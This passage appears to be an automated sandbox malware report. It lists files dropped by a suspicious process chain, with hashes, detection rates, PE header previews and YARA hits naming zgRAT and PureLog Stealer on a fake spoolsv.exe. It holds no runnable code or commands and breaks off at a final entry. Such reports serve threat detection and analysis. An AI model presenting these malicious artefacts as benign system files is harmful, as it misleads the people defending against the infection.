C:\Users\user\Desktop\gCMlaExJ.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hgxdViOd.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ihttcfaK.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jaztMisT.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ksDciByC.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lWnUcfOW.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lkWuMAXT.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oVBKTOiM.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oitSpyyv.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rOQtFLTL.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rxJbrpZI.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\tRDbbuYG.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uwXRiYty.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wDeIoEvg.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wHtSiqYz.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yEUaDqnu.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zFRrKozb.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zOoquaSY.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zsYipEjs.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\PrintDialog\pris\f3b6ecef712a24

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	ASCII text, with very long lines (870), with no line terminators
Category:	dropped
Size (bytes):	870
Entropy (8bit):	5.915266072760663
Encrypted:	false
SSDEEP:	24:xohgSyQttwZjBjJfGy8AtwRuVrApJBudjp:xoJyStETePbRQE3Udjp
MD5:	6F1A22458D2045883D62674F48E5D539
SHA1:	2ADC8DCB9D6E6B38F0B82B3CBB26DDF70C215EA4
SHA-256:	A1A652836BBCC6CF2B3F7D9C624CCB26C4FB5FA645AA7D9029DAF4EEEB8DE2A0
SHA-512:	2F354E7F517856331C91531B005256598D0AF3FDC9D89BA0CB000071F7596AD5B0EA9B979BEA16B006E69F572023D9110F402D974B46C16DE3B15CCB4B9A886C
Malicious:	false
Preview:	cH0ppcGSOB3ci9JhxE1qY3C4WLD3bRroPuRmO2MZlvzOXeRd5V6fHBdjF6SeZN16UPNxshS52cEnDxg13j7FVLgORrhRjrAY434IRdvYDBno6zfRabkzPvlIs8gAAAVKcqsK3XkayjCTi2SbMP1IGKIJRvZS6uXCqcMQHUYC0KBqtRk0qFyuJMERhj2H8RdDL9nFpCT11zR6IbaAKjl15m3dY4sibQEjq7ftoeKov73U4HJGJ26YpmHiGJruTvZkusQK6rVpY6F8tiiQvmYjTp3Dz6mfxZUAhSjM18JchQAthJzikb9rW0RFzMU9Ez28mFaa9WYwc6BCpKgqHE4WamnrBeXpnKXrYBGbsYiOCNPZyOZoqo1A5gi9btZe8tJSjUooDE7tfqTNXN3wEs89SWw1cH998DPTE7zdkvllqIfONVlNznaPuJ9NiwL5F8ubaAIZYaMTHXSJ1hoGfvKVn9i47m5xjpfsXDxNMMzZaGIW1zWBIFZTyZxbbOcvfYub1kwxtb3T5u4h1LCHQ4pdPM47QWv8tE4CWqeQDiRqLGYDfQjPLUflsQMpqyhWq5j101LKqwErm9SJx0c9xfwZjTTFezkOB4APggMnEYjZQx8t8D1zWhjKJKShhFq1Lzpr8CmRnz4Y6WJvUkHb7v2eVzGWOpF9srOaHQv5akLgmLOwAhM78P4a7LWI6QD8t5pOItnDzLAWjV1KlTVrcHAcxyc64m9KhNwqfAoR3IIwOh0lTMhm4Wfm4NbUQrJNM0zWiLpkpExU9OOP70msEXQLsKvSiUAM95jYseDIg77ziLmq8MXaEaIzknnYZWCVDkUEozgcxdLHaamghFTW7kHiwuyE0otJ5lw80iBJp4

C:\Windows\PrintDialog\pris\spoolsv.exe

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\PrintDialog\pris\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\PrintDialog\pris\spoolsv.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\providerBrowserruntimeCrt\81eb946674e99f

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
